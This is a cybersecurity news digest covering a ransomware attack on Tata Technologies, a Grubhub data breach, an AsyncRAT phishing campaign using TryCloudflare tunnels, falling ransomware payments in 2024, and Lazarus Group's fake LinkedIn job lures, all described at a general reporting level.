India’s Tata Technologies suspends some IT services after ransomware attack
Tata Technologies Ltd., a subsidiary of Tata Motors, was hit by a ransomware attack, forcing the company to temporarily suspend some IT services. The Indian multinational company, which specializes in automotive design, aerospace engineering and R&D, operates across multiple regions and employs over 11,000 people.
The company informed India's national stock exchange that the affected IT assets have now been restored, and client delivery services remained unaffected throughout the incident. A detailed investigation is underway with cybersecurity experts, but no ransomware group has claimed responsibility, and it remains unclear if data was stolen.
This is not the first attack on a Tata-owned company, as the Hive ransomware group previously targeted Tata Power in October 2022, leaking sensitive data on the dark web. In India, the number of reported ransomware attack incidents impacting various sectors totaled 98 in 2024, which represents a 55% increase compared to the 63 attacks recorded in 2023.
Customers and drivers affected after a data breach at Grubhub
Grubhub, a major U.S. food delivery platform, confirmed that attackers breached its internal systems, exposing personal details of customers, merchants and drivers. The platform, which operates in over 4,000 U.S. cities, was acquired by Wonder Group in 2023 for $650 million, significantly less than its $7.3 billion valuation in 2020.
The company detected “unusual activity” linked to a third-party service provider, prompting an investigation and the immediate removal of the provider from its systems. The data breach compromised names, email addresses, phone numbers and partial payment card details, including the last four digits, primarily affecting Campus Dining users.
While hashed passwords for legacy systems were accessed, bank account details and Social Security numbers were not impacted, according to Grubhub. The company has yet to disclose the total number of affected individuals or the exact timeline of the breach.
Python payloads and TryCloudFlare tunnels used in campaign to deliver AsyncRAT malware
A newly discovered malware campaign has been using Python payloads and TryCloudflare tunnels to deliver AsyncRAT, a remote access trojan (RAT) used for data exfiltration and stealthy system control.
The attack begins with a phishing email containing a Dropbox URL that downloads a ZIP archive, which includes an LNK file and a decoy PDF document to trick recipients. The LNK file, retrieved via TryCloudflare, executes PowerShell scripts that download additional malware payloads, including AsyncRAT, Venom RAT and XWorm.
A similar attack variant last year distributed GuLoader, PureLogs Stealer, and Remcos RAT, sometimes exploiting a Windows MotW bypass vulnerability (CVE-2024-38213). Cybercriminals are increasingly misusing legitimate services like Dropbox and TryCloudflare to distribute malware while making attacks appear credible.
Increased resistance to cyber extortion as ransomware payments fell by 35% in 2024
Ransomware payments dropped by 35% in 2024, totaling $813.55 million, compared to $1.25 billion in 2023, as reported by researchers. Only 30% of victims who engaged in negotiations paid the ransom, reflecting increased resistance against cyber extortion.
Despite the decline in payments, 2024 saw a record 5,263 ransomware breaches, the highest ever recorded. A Fortune 50 company paid $75 million to the Dark Angels ransomware group, marking the largest single payment of the year.
Law enforcement crackdowns, including Operation Cronos against LockBit, and the ALPHV/BlackCat exit scam, significantly disrupted major ransomware groups. The median ransom payment dropped in 2024, indicating that even when payments were made, they were often negotiated down. 39% of ransomware proceeds were laundered through centralized exchanges, while cybercriminals increasingly used cross-chain bridges to evade tracking. More ransomware affiliates are now holding proceeds in personal wallets, fearing law enforcement action, which complicates laundering efforts.
Fake LinkedIn job offers used by North Korean hackers to target businesses
The North Korean Lazarus Group is using fake LinkedIn job offers to trick individuals into sharing sensitive data and installing malware.
Victims are lured with offers to collaborate on a decentralized crypto exchange, submitting CVs or GitHub links as part of the recruitment process. Attackers then provide access to a fake demo project, which, when executed, downloads malicious payloads. The malware first steals cryptocurrency wallet data before deploying additional components to monitor activity, extract files and capture browser logins. Further payloads, delivered via Tor Proxy servers, include a persistent backdoor, keylogger and cryptominer.
According to researchers, Lazarus' real goal is to steal classified data from critical industries. Due to that, the researchers are urging professionals to scrutinize vague job offers and avoid executing foreign code on enterprise devices.
